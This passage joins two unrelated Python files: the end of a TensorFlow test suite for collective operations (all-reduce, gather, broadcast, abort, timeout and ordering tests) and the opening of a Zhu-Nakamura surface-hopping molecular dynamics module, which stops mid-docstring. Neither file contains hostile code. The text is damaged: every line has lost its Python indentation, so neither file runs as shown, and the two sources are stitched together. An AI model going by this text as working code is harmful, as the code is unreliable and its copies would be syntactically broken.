dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
    # the time of an op error. We rely on cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
    # This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
dynamics.py
|
from datetime import datetime
import numpy as np
import random
import torch
import copy
from torch.multiprocessing import set_start_method
from torch.utils.data import DataLoader
from ase.io.trajectory import Trajectory
from nff.md.utils_ax import mol_dot, mol_norm, ZhuNakamuraLogger, atoms_to_nxyz
from nff.md.nvt_ax import NoseHoover, NoseHooverChain
from nff.md.nms import nms_sample
from nff.utils.constants import BOHR_RADIUS, FS_TO_AU, AMU_TO_AU, ASE_TO_FS
from nff.data import Dataset, collate_dicts
from nff.utils.cuda import batch_to
from nff.utils.constants import KCAL_TO_AU, KB_AU
from nff.nn.utils import single_spec_nbrs
from nff.train import load_model, batch_detach
HBAR = 1
OUT_FILE = "trj.csv"
LOG_FILE = "trj.log"
DEF_EXPLICIT_DIABAT = False
DEF_MAX_GAP_HOP = float("inf")
DEFAULT_SKIN = 1.0
METHOD_DIC = {
"nosehoover": NoseHoover,
"nosehooverchain": NoseHooverChain
}
class ZhuNakamuraDynamics(ZhuNakamuraLogger):
"""
Class for running Zhu-Nakamura surface-hopping dynamics. This method follows the description in
Yu et. al, "Trajectory based nonadiabatic molecular dynamics without calculating nonadiabatic
coupling in the avoided crossing case: Trans <-> cis photoisomerization in azobenzene ", Phys.
Chem. Chem. Phys. 2014, doi: 10.1039/c4cp03498h.
Attributes:
atoms (ase.atoms.Atoms): atoms of the system
dt (float): dynamics time-step
max_time (float): maximum time of simulation
time (float): current time
num_states (int): total number of electronic states
Natom (int): number of atoms
out_file (str): name of output file with saved quantities
log_file (str): name of file to log information about trajectory
_time (float): current time in trajectory
_positions (numpy.ndarray): array of atomic positions
_velocities (numpy.ndarray): array of atomic velocities
_forces (numpy.ndarray): array of shape (num_states, num_atoms, 3) for atomic forces,
where num_states is the number of electronic states. The first dimension corresponds
to which state the force is on, the second to which atom the force is on, and the third
to which dimension the force is in.
_energies (numpy.ndarray): array of shape (num_states). There is one energy for each state.
_surf (int): current electronic state that the system is in
_in_trj (bool): whether or not the current frame is "in the trajectory". The frame may not
be in the trajectory in the following example. If an avoided crossing is found, and a
hop occurs, then the last two frames are "removed" from the trajectory and replaced
with a new frame. The new frame has the position of the second last frame, but a new
surface and new re-scaled velocities. In this case the last two frames are not considered
to be in the trajectory.
_hopping_probabilities (list): A list of dictionaries with the Zhu a, b and p parameters.
Each dictionary has information for hopping between different pairs of states.
position_list (list): list of _positions at all past times in the trajectory
velocity_list (list): list of _velocities at all past times in the trajectory
force_list (list): list of _forces at all past times in the trajectory
energy_list (list): list of _energies at all past times in the trajectory
surf_list (list): list of _surf at all past times in the trajectory
        in_trj_list (list): list of _in_trj at all past times in the trajectory.
time_list (list): list of times in trajectory
hopping_probability_list (list): list of hopping probabilities at previous times
diabatic_forces (numpy.ndarray): array of shape (2, num_atoms, 3) for the diabatic forces
acting on a lower and upper diabatic state. If self.num_states > 2, the lower and upper
diabatic states depend on which 2 of self.num_states are at an avoided crossing.
diabatic_coupling (float): coupling strength between the upper and lower diabatic state.
zhu_difference (float): Zhu difference parameter, used for calculating hopping probability
zhu_product (float): Zhu product parameter, used for calculating hopping probability
zhu_sign (int): Zhu sign parameter (+/- 1), used for calculating hopping probability
n_vector (numpy.ndarray): Zhu n-vector, of shape (num_atoms, 3), used for calculating
hopping probability
v_parallel (numpy.ndarray): Component of the velocity parallel to the hopping direction. Has
shape (num_atoms), and is used for calculating hopping probability.
ke_parallel (float): Kinetic energy associated with v_parallel.
ke (float): Total kinetic energy
hopping_probabilities (list): A list of dictionaries with the Zhu a, b and p parameters.
Each dictionary has information for hopping between different pairs of states.
Properties:
positions: returns self._positions. Updating positions updates self._positions,
self.positions_list, and positions of self.atoms.
velocities: returns self._velocities. Updating positions updates self._velocities,
self.velocities_list and velocities of self.atoms.
forces: returns self._forces. Updating forces updates self._forces, self.forces_list
and forces of self.atoms.
energies: returns self._energies. Updating energies updates self._energies,
self.energy_list and energies of self.atoms.
surf: returns self._surf. Updating surf updates self._surf and self.surf_list.
        in_trj: returns self._in_trj. Updating in_trj updates self._in_trj and self.in_trj_list.
time: returns self._time. Updating time updates self.time_list.
hopping_probabilities: returns self._hopping_probabilities. Updating hopping_probabilities
updates self.hopping_probability_list
"""
def __init__(self,
atoms,
timestep,
max_time,
explicit_diabat=DEF_EXPLICIT_DIABAT,
max_gap_hop=DEF_MAX_GAP_HOP,
initial_time=0.0,
initial_surf=1,
num_states=2,
out_file=OUT_FILE,
log_file=LOG_FILE,
save_period=None,
**kwargs):
"""
Initializes a ZhuNakamura instance.
Args:
atoms (ase.atoms.Atoms): atoms of the system
timestep (float): timestep for the dynamics, in femtoseconds
initial_time (float): initial time for the dynamics
max_time (float): total time of simulation
initial_surf (int): initial electronic state for the dynamics. Note that, as always, we use
Python numbering, so that initial_surf = 1 means you start on the first excited state,
and initial_surf = 0 means you start on the ground state.
num_states (int): number of total electronic states
            out_file (str): name of the csv file in which trajectory quantities are saved
            log_file (str): name of the log file for this trajectory
            save_period (float): how often, in fs, trajectory quantities are saved
Returns:
None
"""
self.atoms = atoms
self.dt = timestep * FS_TO_AU
self.max_time = max_time * FS_TO_AU
self.num_states = num_states
self.Natom = len(atoms)
self.max_gap_hop = max_gap_hop
self.explicit_diabat = explicit_diabat
self.diabat_ens = None
self.diabat_forces = None
self.out_file = out_file
self.log_file = log_file
self.save_period = (save_period if save_period is
not None else self.dt / FS_TO_AU)
self.setup_logging()
# everything in a.u. other than positions (which are in angstrom)
self._positions = atoms.get_positions()
self._velocities = (atoms.get_velocities()
/ BOHR_RADIUS / (ASE_TO_FS * FS_TO_AU))
self._forces = None
self._energies = None
self._surf = initial_surf
self._in_trj = True
self._time = initial_time * FS_TO_AU
self._hopping_probabilities = []
self.position_list = [self._positions]
self.velocity_list = [self._velocities]
self.force_list = None
self.energy_list = None
self.surf_list = [self._surf]
self.in_trj_list = [self._in_trj]
self.time_list = [self._time]
self.hopping_probability_list = [self._hopping_probabilities]
self.old_accel = None
# Initialize Zhu-Nakamura quantities
self.diabatic_forces = np.array([])
self.diabatic_coupling = 0.0
self.zhu_difference = 0.0
self.zhu_product = 0.0
self.zhu_sign = 0
self.n_vector = np.array([])
self.v_parallel = np.array([])
self.ke_parallel = 0.0
self.ke = 0.0
save_keys = ["position_list", "velocity_list", "force_list",
"energy_list", "surf_list", "in_trj_list",
"hopping_probability_list", "time_list"]
super().__init__(save_keys=save_keys, **self.__dict__)
@property
def positions(self):
return self._positions
@property
def velocities(self):
return self._velocities
@property
def forces(self):
return self._forces
@property
def energies(self):
return self._energies
@property
def surf(self):
return self._surf
@property
def in_trj(self):
return self._in_trj
@property
def time(self):
return self._time
@property
def hopping_probabilities(self):
return self._hopping_probabilities
@positions.setter
def positions(self, value):
self._positions = value
# add positions to position_list
self.position_list.append(value)
# update the positions of self.atoms
self.atoms.set_positions(value)
@velocities.setter
def velocities(self, value):
"""
Automatically update quantities associated with velocities when changing the velocities.
Args:
value (numpy.ndarray): new array of velocities
Returns:
None
"""
self._velocities = value
# add velocities to velocity_list
self.velocity_list.append(value)
# update the velocities of self.atoms
self.atoms.set_velocities(value)
@forces.setter
def forces(self, value):
"""
Automatically update quantities associated with forces when changing the forces.
Args:
value (numpy.ndarray): new array of forces
Returns:
None
"""
self._forces = value
# add forces to force_list
if hasattr(self.force_list, "__iter__"):
self.force_list.append(value)
else:
self.force_list = [value]
@energies.setter
def energies(self, value):
"""
        Automatically update quantities associated with energies when changing the energies.
Args:
value (numpy.ndarray): new array of energies
Returns:
None
"""
self._energies = value
# add energies to energy_list
if hasattr(self.energy_list, "__iter__"):
self.energy_list.append(value)
else:
self.energy_list = [value]
@surf.setter
def surf(self, value):
"""
Automatically update quantities associated with surf when changing the surface.
Args:
value (int): new surface
Returns:
None
"""
self._surf = value
# add surf to surf_list
self.surf_list.append(value)
@in_trj.setter
def in_trj(self, value):
"""
Automatically update quantities associated with in_trj when changing in_trj.
Args:
value (bool): whether or not the new frame is in the trajectory.
Returns:
None
"""
self._in_trj = value
# add in_trj to in_trj_list
self.in_trj_list.append(value)
@time.setter
def time(self, value):
"""
Automatically update quantities associated with time when changing time.
Args:
value (float): new time
Returns:
None
"""
self._time = value
# add time to time_list
self.time_list.append(value)
@hopping_probabilities.setter
def hopping_probabilities(self, value):
"""
Automatically update quantities associated with hopping probabilities when changing it.
Args:
value (list): new hopping probabilities
Returns:
None
"""
self._hopping_probabilities = value
self.hopping_probability_list.append(value)
def update_forces(self):
"""
Update self.forces by get_forces() on self.atoms
"""
self.forces = self.atoms.get_forces()
def update_energies(self):
"""
Update self.energies by get_potential_energy() on self.atoms
"""
self.energies = self.atoms.get_potential_energy()
def get_masses(self):
"""
Get masses of system atoms.
Returns:
self.atoms.get_masses() (numpy.ndarray): masses
"""
return self.atoms.get_masses()*AMU_TO_AU
def get_accel(self):
"""
Get current acceleration of atoms
Returns:
accel (nump.ndarray): acceleration
"""
# the force is force acting on the current state
force = self.forces[self.surf]
accel = (force / self.get_masses().reshape(-1, 1))
return accel
def position_step(self):
# get current acceleration and velocity
accel = self.get_accel()
self.old_accel = accel
# take a step for the positions
# positions are in Angstrom so they must be properly converted
# Note also that we don't use += here, because that causes problems
# with setters.
self.positions = (self.positions + (self.velocities * self.dt
+ 1 / 2 * accel * self.dt ** 2
) * BOHR_RADIUS)
def velocity_step(self, do_log=True):
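        """
        Take the velocity half of a velocity Verlet step,
        v(t + dt) = v(t) + (1/2) * (a(t) + a(t + dt)) * dt,
        then record the new frame (surface and time) and optionally log the step.
        Args:
            do_log (bool): whether to log the completed step
        """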
new_accel = self.get_accel()
self.velocities = self.velocities + 1 / 2 * \
(new_accel + self.old_accel) * self.dt
# assume the current frame is in the trajectory until
# finding out otherwise
self.in_trj = True
# update surf (which also appends to surf_list)
self.surf = self.surf
self.time = self.time + self.dt
step = int(self.time/self.dt)
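        # relative energies converted from Hartree to eV (1 Hartree ~ 27.2 eV)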
rel_ens = ", ".join(((self.energies - self.energies[0]) * 27.2
).reshape(-1).astype("str").tolist())
if do_log:
self.log(f"Completed step {step}. Currently in state {self.surf}.")
self.log(f"Relative energies are {rel_ens} eV")
def md_step(self):
"""
Take a regular molecular dynamics step on the current surface.
"""
self.position_step()
# get forces and energies at new positions
self.update_forces()
self.update_energies()
self.velocity_step()
def check_crossing(self):
"""Check if we're at an avoided crossing by seeing if the energy gap
was at a minimum in the last step.
Args:
None
Returns:
at_crossing (bool): whether we're at an avoided crossing for any combination of states
new_surfs (list): list of surfaces that are at an avoided crossing with the current
surface.
"""
new_surfs = []
at_crossing = False
# if we've taken less than three steps, we can't check if we're at
# an avoided crossing
if len(self.energy_list) < 3 or len(self.surf_list) < 3:
return at_crossing, new_surfs
# all of the past three steps must be in the trajectory. This stops us
# from trying to re-hop after we've already hopped at an avoided
# crossing. If a hop has already happened, then you don't try it again
# at the same position.
if not all(is_in_trj for is_in_trj in self.in_trj_list[-3:]):
return at_crossing, new_surfs
# loop through states other than self.surf and see if they're
# at an avoided crossing
for i in range(self.num_states):
if i == self.surf:
continue
# list of energy gaps
gaps = [abs(energies[i] - energies[self.surf])
for energies in self.energy_list[-3:]]
# whether or not the middle gap is the smallest of the three
gap_min = gaps[0] > gaps[1] and gaps[2] > gaps[1]
if gap_min:
new_surfs.append(i)
at_crossing = True
return at_crossing, new_surfs
def get_diabat_engrads(self,
lower_state,
upper_state):
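        """
        Estimate the diabatic forces and diabatic coupling around an avoided crossing
        by linearly interpolating the adiabatic forces from the last three frames,
        following the Zhu-Nakamura prescription. The coupling is taken as half the
        adiabatic gap at the middle frame.
        Args:
            lower_state (int): index of the lower electronic state
            upper_state (int): index of the upper electronic state
        Returns:
            diabatic_forces (numpy.ndarray): forces on the lower and upper diabats
            diabatic_coupling (float): estimated diabatic coupling
        """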
# update diabatic forces. Start with the r_{ij} parameters
# from the ZN paper units for r_{ij} don't matter since
# they only get called in ratios
r_20 = self.position_list[-1] - self.position_list[-3]
r_10 = self.position_list[-2] - self.position_list[-3]
r_12 = self.position_list[-2] - self.position_list[-1]
        # diabatic forces on the lower state
lower_diabatic_forces = -(-self.force_list[-1][lower_state] * r_10 +
self.force_list[-3][upper_state] * r_12
) / r_20
# diabatic forces on the upper state
upper_diabatic_forces = -(-self.force_list[-1][upper_state] * r_10 +
self.force_list[-3][lower_state] * r_12
) / r_20
# array of forces on the lower and upper diabatic states
diabatic_forces = np.append([lower_diabatic_forces],
[upper_diabatic_forces], axis=0)
# update diabatic coupling
diabatic_coupling = (
self.energy_list[-2][upper_state].item()
- self.energy_list[-2][lower_state].item()) / 2
return diabatic_forces, diabatic_coupling
def update_diabatic_quants(self, lower_state, upper_state):
"""
Update diabatic quantities at an avoided crossing.
Args:
lower_state (int): index of lower electronic state at crossing
